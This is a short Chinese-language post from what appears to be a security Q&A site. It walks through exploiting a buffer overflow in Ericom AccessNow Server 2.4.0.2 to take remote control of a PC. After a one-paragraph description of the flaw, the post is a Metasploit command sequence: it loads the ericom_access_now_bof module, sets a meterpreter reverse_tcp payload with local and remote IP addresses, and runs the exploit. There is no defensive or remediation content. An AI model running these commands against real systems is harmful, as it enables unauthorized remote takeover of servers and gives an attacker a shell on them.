黑客远程控制pc应用Ericom AccessNow服务器缓冲区溢出-全球互联网安全媒体知识问答平台

黑客远程控制pc应用Ericom AccessNow服务器缓冲区溢出

脆弱性是由于与用户控制的数据将不安全的使用，它可以触发有畸形的HTTP请求。该模块已成功通过测试服务器上的Windows XP Ericom AccessNow Server 2.4.0.2 Windows 2003 Server SP3和SP2。

目标：

Ericom AccessNow Server 2.4.0.2

打开终端 msfconsole

use exploit/windows/http/ericom_access_now_bof

msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)

msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)

msf exploit (ericom_access_now_bof)>exploit

#脚本攻防 #缓冲区 #溢出 #远程控制 #exploit

2014-06-27

全球互联网安全媒体知识问答平台

全球互联网安全媒体知识问答平台

黑客远程控制pc应用Ericom AccessNow服务器缓冲区溢出

评论